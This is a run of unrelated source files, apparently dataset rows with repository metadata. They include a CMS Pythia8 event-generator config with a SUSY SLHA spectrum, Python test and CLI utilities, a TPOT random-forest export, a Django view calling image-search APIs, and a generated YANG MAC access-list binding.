24 1.28600000E+00 # Mc
BLOCK MINPAR
3 2.00000000E+01 # TB
BLOCK EXTPAR
0 0.00000000E+00 # Q
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
11 1.51000000E+03 # At
12 1.51000000E+03 # Ab
13 1.51000000E+03 # Atau
23 2.00000000E+02 # MUE
25 2.00000000E+01 # TB
26 4.00000000E+02 # MA0
27 4.07999802E+02 # MHp
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK MASS
1000012 4.95845890E+02 # MSf(1,1,1)
1000011 5.02289514E+02 # MSf(1,2,1)
2000011 5.01838716E+02 # MSf(2,2,1)
1000002 1.49903009E+03 # MSf(1,3,1)
2000002 1.49959059E+03 # MSf(2,3,1)
1000001 1.50117388E+03 # MSf(1,4,1)
2000001 1.50020460E+03 # MSf(2,4,1)
1000014 4.95845890E+02 # MSf(1,1,2)
1000013 5.02541395E+02 # MSf(1,2,2)
2000013 5.01586505E+02 # MSf(2,2,2)
1000004 1.49903061E+03 # MSf(1,3,2)
2000004 1.49959117E+03 # MSf(2,3,2)
1000003 1.50118944E+03 # MSf(1,4,2)
2000003 1.50018903E+03 # MSf(2,4,2)
1000016 9.97929430E+02 # MSf(1,1,3)
1000015 9.98819801E+02 # MSf(1,2,3)
2000015 1.00324582E+03 # MSf(2,2,3)
1000006 8.76429378E+02 # MSf(1,3,3)
2000006 1.13478243E+03 # MSf(2,3,3)
1000005 9.96111023E+02 # MSf(1,4,3)
2000005 1.00594745E+03 # MSf(2,4,3)
25 1.24781549E+02 # Mh0
35 3.99966626E+02 # MHH
36 4.00000000E+02 # MA0
37 4.08364422E+02 # MHp
1000022 8.78206612E+01 # MNeu(1)
1000023 1.51359250E+02 # MNeu(2)
1000025 -2.10117348E+02 # MNeu(3)
1000035 2.66409088E+02 # MNeu(4)
1000024 1.47528170E+02 # MCha(1)
1000037 2.66764158E+02 # MCha(2)
1000021 1.50000000E+03 # MGl
BLOCK DMASS
0 1.73200000E+02 # Q
25 7.10837338E-01 # Delta Mh0
35 1.19120788E-03 # Delta MHH
36 0.00000000E+00 # Delta MA0
37 1.73007786E-02 # Delta MHp
BLOCK NMIX
1 1 9.30213894E-01 # ZNeu(1,1)
1 2 -1.18546783E-01 # ZNeu(1,2)
1 3 3.13311260E-01 # ZNeu(1,3)
1 4 -1.49949409E-01 # ZNeu(1,4)
2 1 -3.23202104E-01 # ZNeu(2,1)
2 2 -6.93891430E-01 # ZNeu(2,2)
2 3 5.08023191E-01 # ZNeu(2,3)
2 4 -3.94927234E-01 # ZNeu(2,4)
3 1 9.59510181E-02 # ZNeu(3,1)
3 2 -1.33592266E-01 # ZNeu(3,2)
3 3 -6.78206777E-01 # ZNeu(3,3)
3 4 -7.16227671E-01 # ZNeu(3,4)
4 1 -1.45037624E-01 # ZNeu(4,1)
4 2 6.97577558E-01 # ZNeu(4,2)
4 3 4.28700431E-01 # ZNeu(4,3)
4 4 -5.55486794E-01 # ZNeu(4,4)
BLOCK UMIX
1 1 -6.08113363E-01 # UCha(1,1)
1 2 7.93850198E-01 # UCha(1,2)
2 1 7.93850198E-01 # UCha(2,1)
2 2 6.08113363E-01 # UCha(2,2)
BLOCK VMIX
1 1 -7.93850198E-01 # VCha(1,1)
1 2 6.08113363E-01 # VCha(1,2)
2 1 6.08113363E-01 # VCha(2,1)
2 2 7.93850198E-01 # VCha(2,2)
BLOCK STAUMIX
1 1 6.88810103E-01 # USf(1,1)
1 2 7.24941820E-01 # USf(1,2)
2 1 7.24941820E-01 # USf(2,1)
2 2 -6.88810103E-01 # USf(2,2)
BLOCK STOPMIX
1 1 7.08249465E-01 # USf(1,1)
1 2 -7.05962248E-01 # USf(1,2)
2 1 7.05962248E-01 # USf(2,1)
2 2 7.08249465E-01 # USf(2,2)
BLOCK SBOTMIX
1 1 6.52799510E-01 # USf(1,1)
1 2 7.57530726E-01 # USf(1,2)
2 1 7.57530726E-01 # USf(2,1)
2 2 -6.52799510E-01 # USf(2,2)
BLOCK ALPHA
-5.91856359E-02 # Alpha
BLOCK DALPHA
1.87535199E-04 # Delta Alpha
BLOCK HMIX Q= -0.99900000E+03
1 2.00000000E+02 # MUE
2 2.00000000E+01 # TB
BLOCK MSOFT Q= 0.00000000E+00
1 9.54716519E+01 # M1
2 2.00000000E+02 # M2
3 1.50000000E+03 # M3
31 5.00000000E+02 # MSL(1)
32 5.00000000E+02 # MSL(2)
33 1.00000000E+03 # MSL(3)
34 5.00000000E+02 # MSE(1)
35 5.00000000E+02 # MSE(2)
36 1.00000000E+03 # MSE(3)
41 1.50000000E+03 # MSQ(1)
42 1.50000000E+03 # MSQ(2)
43 1.00000000E+03 # MSQ(3)
44 1.50000000E+03 # MSU(1)
45 1.50000000E+03 # MSU(2)
46 1.00000000E+03 # MSU(3)
47 1.50000000E+03 # MSD(1)
48 1.50000000E+03 # MSD(2)
49 1.00000000E+03 # MSD(3)
BLOCK AE Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.51000000E+03 # Af(3,3)
BLOCK AU Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.51000000E+03 # Af(3,3)
BLOCK AD Q= 0.00000000E+00
1 1 0.00000000E+00 # Af(1,1)
2 2 0.00000000E+00 # Af(2,2)
3 3 1.51000000E+03 # Af(3,3)
BLOCK YE Q= 0.00000000E+00
1 1 5.87736714E-05 # Yf(1,1)
2 2 1.21525301E-02 # Yf(2,2)
3 3 2.04389044E-01 # Yf(3,3)
BLOCK YU Q= 0.00000000E+00
1 1 1.72525825E-05 # Yf(1,1)
2 2 7.39560703E-03 # Yf(2,2)
3 3 9.96049095E-01 # Yf(3,3)
BLOCK YD Q= 0.00000000E+00
1 1 6.76269414E-04 # Yf(1,1)
2 2 1.07071436E-02 # Yf(2,2)
3 3 4.49839737E-01 # Yf(3,3)
BLOCK VCKMIN
1 2.25300000E-01 # lambda
2 8.08000000E-01 # A
3 1.32000000E-01 # rhobar
4 3.41000000E-01 # etabar
BLOCK MSL2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSL2(1,1)
2 2 2.50000000E+05 # MSL2(2,2)
3 3 1.00000000E+06 # MSL2(3,3)
BLOCK MSE2 Q= 0.00000000E+00
1 1 2.50000000E+05 # MSE2(1,1)
2 2 2.50000000E+05 # MSE2(2,2)
3 3 1.00000000E+06 # MSE2(3,3)
BLOCK MSQ2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSQ2(1,1)
2 2 2.25000000E+06 # MSQ2(2,2)
3 3 1.00000000E+06 # MSQ2(3,3)
BLOCK MSU2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSU2(1,1)
2 2 2.25000000E+06 # MSU2(2,2)
3 3 1.00000000E+06 # MSU2(3,3)
BLOCK MSD2 Q= 0.00000000E+00
1 1 2.25000000E+06 # MSD2(1,1)
2 2 2.25000000E+06 # MSD2(2,2)
3 3 1.00000000E+06 # MSD2(3,3)
BLOCK TE Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 3.08627457E+02 # Tf(3,3)
BLOCK TU Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 1.50403413E+03 # Tf(3,3)
BLOCK TD Q= 0.00000000E+00
1 1 0.00000000E+00 # Tf(1,1)
2 2 0.00000000E+00 # Tf(2,2)
3 3 6.79258003E+02 # Tf(3,3)
BLOCK SELMIX
1 1 9.99989805E-01 # UASf(1,1)
1 4 -4.51557869E-03 # UASf(1,4)
2 2 8.57926156E-01 # UASf(2,2)
2 5 -5.13773015E-01 # UASf(2,5)
3 3 6.88810103E-01 # UASf(3,3)
3 6 7.24941820E-01 # UASf(3,6)
4 1 4.51557869E-03 # UASf(4,1)
4 4 9.99989805E-01 # UASf(4,4)
5 2 5.13773015E-01 # UASf(5,2)
5 5 8.57926156E-01 # UASf(5,5)
6 3 7.24941820E-01 # UASf(6,3)
6 6 -6.88810103E-01 # UASf(6,6)
BLOCK USQMIX
1 1 1.00000000E+00 # UASf(1,1)
1 4 1.78495859E-05 # UASf(1,4)
2 2 9.99970732E-01 # UASf(2,2)
2 5 7.65085064E-03 # UASf(2,5)
3 3 7.08249465E-01 # UASf(3,3)
3 6 -7.05962248E-01 # UASf(3,6)
4 1 -1.78495859E-05 # UASf(4,1)
4 4 1.00000000E+00 # UASf(4,4)
5 2 -7.65085064E-03 # UASf(5,2)
5 5 9.99970732E-01 # UASf(5,5)
6 3 7.05962248E-01 # UASf(6,3)
6 6 7.08249465E-01 # UASf(6,6)
BLOCK DSQMIX
1 1 9.99967318E-01 # UASf(1,1)
1 4 -8.08468495E-03 # UASf(1,4)
2 2 9.92157399E-01 # UASf(2,2)
2 5 -1.24994779E-01 # UASf(2,5)
3 3 6.52799510E-01 # UASf(3,3)
3 6 7.57530726E-01 # UASf(3,6)
4 1 8.08468495E-03 # UASf(4,1)
4 4 9.99967318E-01 # UASf(4,4)
5 2 1.24994779E-01 # UASf(5,2)
5 5 9.92157399E-01 # UASf(5,5)
6 3 7.57530726E-01 # UASf(6,3)
6 6 -6.52799510E-01 # UASf(6,6)
BLOCK CVHMIX
1 1 9.99992809E-01 # UH(1,1)
1 2 3.79243860E-03 # UH(1,2)
1 3 0.00000000E+00 # UH(1,3)
2 1 -3.79243860E-03 # UH(2,1)
2 2 9.99992809E-01 # UH(2,2)
2 3 0.00000000E+00 # UH(2,3)
3 1 0.00000000E+00 # UH(3,1)
3 2 0.00000000E+00 # UH(3,2)
3 3 1.00000000E+00 # UH(3,3)
DECAY 25 4.70802959E-03 # Gamma(h0)
1.95418610E-03 2 22 22 # BR(h0 -> photon photon)
1.23214280E-03 2 22 23 # BR(h0 -> photon Z)
2.21729624E-02 2 23 23 # BR(h0 -> Z Z)
1.83961619E-01 2 -24 24 # BR(h0 -> W W)
5.88903166E-02 2 21 21 # BR(h0 -> gluon gluon)
5.90818475E-09 2 -11 11 # BR(h0 -> Electron electron)
2.62806421E-04 2 -13 13 # BR(h0 -> Muon muon)
7.54101270E-02 2 -15 15 # BR(h0 -> Tau tau)
1.70825517E-07 2 -2 2 # BR(h0 -> Up up)
2.36610068E-02 2 -4 4 # BR(h0 -> Charm charm)
9.60581224E-07 2 -1 1 # BR(h0 -> Down down)
2.41233185E-04 2 -3 3 # BR(h0 -> Strange strange)
6.32212462E-01 2 -5 5 # BR(h0 -> Bottom bottom)
DECAY 35 3.20412715E+00 # Gamma(HH)
-2.77755084E-06 2 22 22 # BR(HH -> photon photon)
-6.07158389E-06 2 22 23 # BR(HH -> photon Z)
-2.06273466E-04 2 23 23 # BR(HH -> Z Z)
-4.48600531E-04 2 -24 24 # BR(HH -> W W)
-2.23155914E-04 2 21 21 # BR(HH -> gluon gluon)
-7.92628201E-09 2 -11 11 # BR(HH -> Electron electron)
3.52698464E-04 2 -13 13 # BR(HH -> Muon muon)
-9.95886348E-02 2 -15 15 # BR(HH -> Tau tau)
-1.88056182E-12 2 -2 2 # BR(HH -> Up up)
-2.60226149E-07 2 -4 4 # BR(HH -> Charm charm)
-3.12544644E-03 2 -6 6 # BR(HH -> Top top)
-9.99612224E-07 2 -1 1 # BR(HH -> Down down)
-2.51030942E-04 2 -3 3 # BR(HH -> Strange strange)
-6.17460245E-01 2 -5 5 # BR(HH -> Bottom bottom)
-1.16051885E-01 2 -1000024 1000024 # BR(HH -> Chargino1 chargino1)
-2.60240183E-02 2 1000022 1000022 # BR(HH -> neutralino1 neutralino1)
-5.41742353E-02 2 1000022 1000023 # BR(HH -> neutralino1 neutralino2)
-4.41526813E-02 2 1000022 1000025 # BR(HH -> neutralino1 neutralino3)
-2.89447512E-06 2 1000022 1000035 # BR(HH -> neutralino1 neutralino4)
-1.81352647E-02 2 1000023 1000023 # BR(HH -> neutralino2 neutralino2)
-1.72404807E-02 2 1000023 1000025 # BR(HH -> neutralino2 neutralino3)
-2.55233739E-03 2 25 25 # BR(HH -> h0 h0)
DECAY 36 3.90369787E+00 # Gamma(A0)
5.57176736E-06 2 22 22 # BR(A0 -> photon photon)
1.29289276E-05 2 22 23 # BR(A0 -> photon Z)
1.69592894E-04 2 21 21 # BR(A0 -> gluon gluon)
6.51102145E-09 2 -11 11 # BR(A0 -> Electron electron)
2.89723220E-04 2 -13 13 # BR(A0 -> Muon muon)
8.18418538E-02 2 -15 15 # BR(A0 -> Tau tau)
1.08202483E-12 2 -2 2 # BR(A0 -> Up up)
1.50152746E-07 2 -4 4 # BR(A0 -> Charm charm)
7.24672723E-03 2 -6 6 # BR(A0 -> Top top)
8.21480267E-07 2 -1 1 # BR(A0 -> Down down)
2.06296952E-04 2 -3 3 # BR(A0 -> Strange strange)
5.07481614E-01 2 -5 5 # BR(A0 -> Bottom bottom)
2.37952527E-01 2 -1000024 1000024 # BR(A0 -> Chargino1 chargino1)
2.94212998E-02 2 1000022 1000022 # BR(A0 -> neutralino1 neutralino1)
7.83260369E-02 2 1000022 1000023 # BR(A0 -> neutralino1 neutralino2)
1.34210317E-02 2 1000022 1000025 # BR(A0 -> neutralino1 neutralino3)
1.48734679E-04 2 1000022 1000035 # BR(A0 -> neutralino1 neutralino4)
4.13778850E-02 2 1000023 1000023 # BR(A0 -> neutralino2 neutralino2)
1.82692714E-03 2 1000023 1000025 # BR(A0 -> neutralino2 neutralino3)
2.70271220E-04 2 23 25 # BR(A0 -> Z h0)
3.11250143E-35 2 25 25 # BR(A0 -> h0 h0)
DECAY 37 2.36360435E+00 # Gamma(Hp)
1.14378215E-08 2 -11 12 # BR(Hp -> Electron nu_e)
4.89002442E-04 2 -13 14 # BR(Hp -> Muon nu_mu)
1.38317284E-01 2 -15 16 # BR(Hp -> Tau nu_tau)
1.30513154E-06 2 -1 2 # BR(Hp -> Down up)
1.48741764E-05 2 -3 2 # BR(Hp -> Strange up)
8.72688321E-06 2 -5 2 # BR(Hp -> Bottom up)
7.23912198E-08 2 -1 4 # BR(Hp -> Down charm)
3.26888781E-04 2 -3 4 # BR(Hp -> Strange charm)
1.22205242E-03 2 -5 4 # BR(Hp -> Bottom charm)
9.71601512E-07 2 -1 6 # BR(Hp -> Down top)
2.15008667E-05 2 -3 6 # BR(Hp -> Strange top)
5.87063081E-01 2 -5 6 # BR(Hp -> Bottom top)
1.55173525E-01 2 1000022 1000024 # BR(Hp -> neutralino1 chargino1)
2.26104275E-03 2 1000022 1000037 # BR(Hp -> neutralino1 chargino2)
2.25127136E-02 2 1000023 1000024 # BR(Hp -> neutralino2 chargino1)
9.20758052E-02 2 1000024 1000025 # BR(Hp -> chargino1 neutralino3)
5.11096070E-04 2 24 25 # BR(Hp -> W h0)
2.34647524E-08 2 24 35 # BR(Hp -> W HH)
2.30058550E-08 2 24 36 # BR(Hp -> W A0)
DECAY 6 1.37127534E+00 # Gamma(top)
1.00000000E+00 2 5 24 # BR(top -> bottom W)
"""
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
pythiaPylistVerbosity = cms.untracked.int32(1),
filterEfficiency = cms.untracked.double(1),
pythiaHepMCVerbosity = cms.untracked.bool(False),
SLHATableForPythia8 = cms.string('%s' % SLHA_TABLE),
comEnergy = cms.double(COM_ENERGY),
crossSection = cms.untracked.double(CROSS_SECTION),
maxEventsToPrint = cms.untracked.int32(1),
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
processParameters = cms.vstring(
'Higgs:useBSM = on',
PROCESS,
'SLHA:allowUserOverride = off',
'SLHA:minMassSM = 100.',
'PhaseSpace:mHatMin = 56.0'
),
parameterSets = cms.vstring(
'pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'
)
)
)
ProductionFilterSequence = cms.Sequence(generator)
| [
"[email protected]"
] | |
aba2a884d4f2b0a73725dccefc5950fbfc7e745e | 74afe97073a0693042d31567ba1a5741bcdebf72 | /tests/utils.py | 82762100c4b3ab85ace2b7d2ff312d3fe836d466 | [
"Apache-2.0"
] | permissive | bruvio/tinyber | 82aa34a5cdf842caa0f863540b249e37ae09fc78 | d20d33341f9e74ba9b699553a8cf6448c167dec9 | refs/heads/master | 2021-05-29T23:07:58.841678 | 2015-07-23T23:24:52 | 2015-07-23T23:24:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 894 | py | from asn1ate import parser
from asn1ate.sema import *
from tinyber.walker import Walker
from tinyber.py_nodes import PythonBackend as Backend
from tinyber import py_nodes as nodes
def generate(infilename, outfilename):
class FakeArgs(object):
no_standalone = False
import os
with open(infilename) as f:
asn1def = f.read()
parse_tree = parser.parse_asn1(asn1def)
modules = build_semantic_model(parse_tree)
assert (len(modules) == 1)
module_name = outfilename
path = "tests"
args = FakeArgs()
# pull in the python-specific node implementations
walker = Walker(modules[0], nodes)
walker.walk()
backend = Backend(args, walker, module_name, path)
backend.generate_code()
def test_reload():
import sys
sys.path[:0] = '.'
# reload tests since we just created a new module
import tests
reload(tests)
| [
"[email protected]"
] | |
7aa513a018f1f1887b44be7689dd657b6c9f8ed5 | fc20620a1fe41c83cb4c17ce36e5d3e6d5dd58fa | /src/python/dicomifier/__main__.py | b0fac30dd2023b3cfec7b87015b30eef36314d09 | [
"LicenseRef-scancode-cecill-b-en"
] | permissive | lamyj/dicomifier | bdd3ad5756563365fe59a31166cbcaa14f98603f | 8601760917f7ef47d87fbd61d2c647c3d9cbeb3e | refs/heads/master | 2023-04-28T15:45:52.571809 | 2023-04-20T15:50:03 | 2023-04-20T15:50:03 | 32,533,252 | 33 | 11 | NOASSERTION | 2022-09-12T16:53:20 | 2015-03-19T16:28:40 | Python | UTF-8 | Python | false | false | 1,955 | py | #########################################################################
# Dicomifier - Copyright (C) Universite de Strasbourg
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
#########################################################################
import argparse
import logging
import sys
from . import commands
def main():
parser = argparse.ArgumentParser(description="Dicomifier")
parser.add_argument(
"--verbosity", "-v", dest="main_verbosity",
choices=["warning", "info", "debug"], default="warning")
subparsers = parser.add_subparsers(help="Available commands")
command_parsers = {}
for name in ["list", "search", "to_dicom", "to_nifti", "diffusion_scheme"]:
command = getattr(commands, name)
subparser = command.setup(subparsers)
subparser.add_argument(
"--verbosity", "-v", dest="child_verbosity",
choices=["warning", "info", "debug"], default="warning")
subparser.set_defaults(action=command.action)
command_parsers[command.action] = subparser
arguments = vars(parser.parse_args())
if "action" not in arguments:
parser.print_help()
return 1
main_verbosity = arguments.pop("main_verbosity").upper()
child_verbosity = arguments.pop("child_verbosity").upper()
verbosity = min(
[getattr(logging, x) for x in [main_verbosity, child_verbosity]])
logging.basicConfig(
level=verbosity,
format="%(levelname)s - %(name)s: %(message)s")
action = arguments.pop("action")
try:
action(**arguments)
except Exception as e:
if verbosity == logging.DEBUG:
raise
else:
command_parsers[action].error(e)
if __name__ == "__main__":
sys.exit(main())
| [
"[email protected]"
] | |
1b103e18ecb604e87e2f579cf645558421707b91 | 8690ca0028c54b62d68badf1753fc6151ae03525 | /Part3 Levels of Aggregation/fse_data/AllROIs/tpot_mnist_pipeline_triangulateAggregationLevelParticipantSplitaggr_2_groups4.py | 7d1fc2a6145b7665e8206ac0c752c83a15062340 | [] | no_license | brains-on-code/conducting-and-analyzing-human-studies | fd74ee77fdc56cc61bdc1e0cf9bf423780f5dddc | 548e7443f4d2bdb2db1f2858289b7d3518593c59 | refs/heads/master | 2021-06-26T21:30:56.386121 | 2020-12-22T13:49:16 | 2020-12-22T13:49:16 | 195,975,817 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 830 | py | import numpy as np
import pandas as pd
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
# NOTE: Make sure that the class is labeled 'target' in the data file
tpot_data = pd.read_csv('PATH/TO/DATA/FILE', sep='COLUMN_SEPARATOR', dtype=np.float64)
features = tpot_data.drop('target', axis=1).values
training_features, testing_features, training_target, testing_target = \
train_test_split(features, tpot_data['target'].values, random_state=42)
# Score on the training set was:1.0
exported_pipeline = RandomForestClassifier(bootstrap=False, criterion="gini", max_features=0.6500000000000001, min_samples_leaf=8, min_samples_split=6, n_estimators=100)
exported_pipeline.fit(training_features, training_target)
results = exported_pipeline.predict(testing_features)
| [
"[email protected]"
] | |
5594d738155165df35681f20b39b82b9a8c92c1f | c9ab605cdd2dbf92c9de05768ade0ecf1718be02 | /03_Django/04_django_crud_review/jobs/views.py | 92e5f3400502a07e8cddaa907118983276b91bed | [] | no_license | PyeongGang-Kim/TIL | 42d69308cf99d2e07644b51d7636e1b64551a697 | 8711501d131ee7d78fdaac544dda2008adf820a1 | refs/heads/master | 2023-01-12T21:10:38.027946 | 2021-10-23T07:19:48 | 2021-10-23T07:19:48 | 195,937,990 | 10 | 1 | null | 2023-01-07T11:25:30 | 2019-07-09T05:22:45 | HTML | UTF-8 | Python | false | false | 2,489 | py | from django.shortcuts import render
from .models import Job
from faker import Faker
from decouple import config
import requests
from IPython import embed
from pprint import pprint
# Create your views here.
def index(request):
return render(request, 'jobs/index.html')
def past_life(request):
name = request.POST.get('name')
person = Job.objects.filter(name=name).first()
if person:
past_job = person.past_job
else:
fake = Faker()
past_job = fake.job()
person = Job(name=name, past_job=past_job)
person.save()
# GIPHY
#1. API키 가져오기
GIPHY_API_KEY = config('GIPHY_API_KEY')
url = 'http://api.giphy.com/v1/gifs/search?api_key={}&q={}&limit=1&'.format(GIPHY_API_KEY, past_job)
data = requests.get(url).json()
image = data.get('data')[0].get('images').get('original').get('url')
#네이버 이미지
#1 요청 헤더 정보 준비
headers = {
'X-Naver-Client-Id': config('NAVER_ID'),
'X-Naver-Client-Secret': config('NAVER_SECRET')
}
#2 요청 url 준비
url2 = 'https://openapi.naver.com/v1/search/image?query='+past_job+'&filter=medium&display=1'
#3 요청 보내기
naver_image = requests.get(url2, headers=headers).json().get('items')[0].get('link')
context = {'person': person, 'image': image, 'naver_image': naver_image}
return render(request, 'jobs/past_life.html', context)
# try:
# name = request.POST.get('name')
# job = Job.objects.get(name=name)
# #요청 url 세팅
# try:
# image = requets.get(url).json().
# except:
# image = None
# context = {
# 'past_life': job.past_job,
# 'name': name,
# 'image': image,
# }
# embed()
# return render(request, 'jobs/past_life.html', context)
# except:
# fake = Faker()
# job = Job(name=name, past_job=fake.job())
# job.save()
# url = 'http://api.giphy.com/v1/gifs/search?api_key=' + GIPHY_API_KEY + '&q='+job.past_job+'&limit=1'
# try:
# image = requets.get(url).json().get('data')[0].get('images').get('original').get('url')
# except:
# image = None
# context = {
# 'past_life': job.past_job,
# 'name': name,
# 'image': image,
# }
# return render(request, 'jobs/past_life.html', context) | [
"[email protected]"
] | |
51849e9e5ed14906063e583aaea90f63365bc874 | 51f887286aa3bd2c3dbe4c616ad306ce08976441 | /pybind/nos/v6_0_2f/mac/access_list/extended/__init__.py | 67d76ccc440658bdb11c3eea1c1eb7f28e382ffa | [
"Apache-2.0"
] | permissive | b2220333/pybind | a8c06460fd66a97a78c243bf144488eb88d7732a | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | refs/heads/master | 2020-03-18T09:09:29.574226 | 2018-04-03T20:09:50 | 2018-04-03T20:09:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,533 | py |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import hide_mac_acl_ext
class extended(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mac-access-list - based on the path /mac/access-list/extended. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__name','__hide_mac_acl_ext',)
_yang_name = 'extended'
_rest_name = 'extended'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)
self.__hide_mac_acl_ext = YANGDynClass(base=hide_mac_acl_ext.hide_mac_acl_ext, is_container='container', presence=False, yang_name="hide-mac-acl-ext", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None, u'hidden': u'wyser-write-hook'}}, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'mac', u'access-list', u'extended']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'mac', u'access-list', u'extended']
def _get_name(self):
"""
Getter method for name, mapped from YANG variable /mac/access_list/extended/name (mac-acl-name)
"""
return self.__name
def _set_name(self, v, load=False):
"""
Setter method for name, mapped from YANG variable /mac/access_list/extended/name (mac-acl-name)
If this variable is read-only (config: false) in the
source YANG file, then _set_name is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_name() directly.
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """name must be of a type compatible with mac-acl-name""",
'defined-type': "brocade-mac-access-list:mac-acl-name",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)""",
})
self.__name = t
if hasattr(self, '_set'):
self._set()
def _unset_name(self):
self.__name = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z0-9]{1}([-a-zA-Z0-9_]{0,62})', 'length': [u'1..63']}), is_leaf=True, yang_name="name", rest_name="name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'ACL_NAME;; Access List Name (Max 63)'}}, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-mac-access-list', defining_module='brocade-mac-access-list', yang_type='mac-acl-name', is_config=True)
